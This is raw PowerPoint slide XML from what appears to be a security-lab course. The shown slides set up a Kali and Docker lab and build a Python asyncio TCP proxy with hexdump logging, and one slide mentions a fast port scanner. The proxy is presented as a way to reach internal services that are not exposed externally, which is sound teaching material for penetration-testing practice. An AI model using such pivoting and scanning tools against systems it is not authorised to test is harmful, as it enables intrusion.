          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218771" y="6009945"/>
            <a:ext cx="9717197"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This port scanner will scan 400 ports a second using asynchronously.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B658FCB2-B36A-4F87-ABE1-1D266021105D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187996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742654" y="1142056"/>
            <a:ext cx="8533693" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Setting up the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B8EB2B-0B2F-4819-BC0E-5646F348B5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070577" y="2150133"/>
            <a:ext cx="8910607"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will assume that Python is installed. In case it’s not, please go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>python.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and download/install it.</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To set up the lab, you will need to be working on a Linux-based environment since we’re going to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> for the lab. We recommend downloading/installing a fresh and up-to-date Kali Linux on VMware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE7EA29-9F3F-4FBB-AD89-19527C70F0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2686144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4055" y="1891134"/>
            <a:ext cx="10205840" cy="9603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can write a TCP proxy that basically forwards packets from a host to another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Proxies can be helpful when trying to access internal services that are not exposed externally.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87C37A8-3F1A-45B2-9387-8F8238536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302" y="2994999"/>
            <a:ext cx="9501311" cy="3480037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31E736C-8BC5-4066-9679-7580D0D52387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060972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4055" y="1891134"/>
            <a:ext cx="10205840" cy="9603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can write a TCP proxy that basically forwards packets from a host to another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Proxies can be helpful when trying to access internal services that are not exposed externally.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8236BD16-B8F0-4F6A-85F7-FC404F639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421" y="2796458"/>
            <a:ext cx="8887326" cy="3992499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD376153-04D4-478A-9C01-898363C374ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303889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7509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Our script will have a feature to display all data that it forwards through a hex dump.</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65157" y="2406315"/>
            <a:ext cx="9372047" cy="440120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asyncio</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logging</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argparse</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6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># display the character if it's printable, otherwise, display '.' instead.</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PRINTABLE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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.join</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126</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;=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&gt;= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</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and</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chr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).encode() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or</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b</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256</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hexdump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bytes</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length</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16</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results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list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 length):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        word = </a:t>
            </a:r>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i:i+length</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printable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>word.translate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PRINTABLE)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hexa</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 '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.join([</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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:02X}</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c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word])</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hexwidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = length*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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results.append</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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:04x}</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hexa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:&lt;{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hexwidth</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printable.decode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line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results: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logging.debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(line)</a:t>
            </a:r>
          </a:p>
          <a:p>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1450FEE5-2BE2-45E2-93F5-E6DCDAB34AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953160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7509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Next, we will define a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>pipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function that rewrite the received data into the target socket.</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65157" y="2501249"/>
            <a:ext cx="937204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pipe</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reader</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writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, *, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sending_remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">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reader.at_eof</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writer.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(data:=</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reader.read</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2048</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sending_remote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logging.debug</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err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Sending</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(data)</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bytes"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logging.debug</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D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Receiving</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(data)</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bytes"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hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(data)</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finally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writer.close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87325A9D-8B5D-4BFB-A15E-A9D5EE41825F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238369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7509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Next, we will define a function to handle any client connection.</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65157" y="2501249"/>
            <a:ext cx="937204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handle_client</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local_reader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local_writer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remote_host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remote_port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remote_reader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remote_writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =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asyncio.open_connection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remote_host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remote_port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pipe1 = pipe(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>local_reader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remote_writer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sending_remote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pipe2 = pipe(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote_reader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local_writer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sending_remote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asyncio.gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(pipe1, pipe2)</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finally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local_writer.close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6F476A66-4C9A-4541-9826-5977EB338A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23617911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7509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Next, we will define the main function that will handle arguments.</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65157" y="2501249"/>
            <a:ext cx="937204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parser = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argparse.ArgumentParser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add_help</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description</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"Simple TCP proxy"</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parser.add_argument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'--server'</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dest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server_host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action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help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"address to listen on (default 0.0.0.0)"</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default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"0.0.0.0"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parser.add_argument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dest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server_port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action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help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"port to listen on (default 9999)"</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default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9999</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parser.add_argument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'-r'</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'--remote-host'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dest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remote_host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action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help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"remote host to connect to"</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parser.add_argument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'--remote-port'</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dest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remote_port</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action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'store'</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help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"remote port to connect to"</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required</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parser.add_argument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'-v'</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'--verbose'</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dest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'verbose'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action</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store_true</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help</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"verbosity"</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default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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE77E79-DEFF-404D-9C9A-7E889B77AE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17769231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7509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Next, we set up asyncio to create a coroutine for each connecting client.</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57136" y="2621565"/>
            <a:ext cx="9372047" cy="397031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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>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Create the server</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loop = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asyncio.new_event_loop</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coro</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asyncio.start_server</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lambda</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reader</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writer</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handle_client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(reader, writer,</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opts.remote_host</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int</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opts.remote_port</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opts.server_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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opts.server_port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server = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loop.run_until_complete</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coro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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Serve requests until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ctrl+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is pressed</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logging.info(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Serving on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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.format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server.sockets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getsockname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try</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loop.run_forever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except</a:t>
            </a:r>
            <a:r>
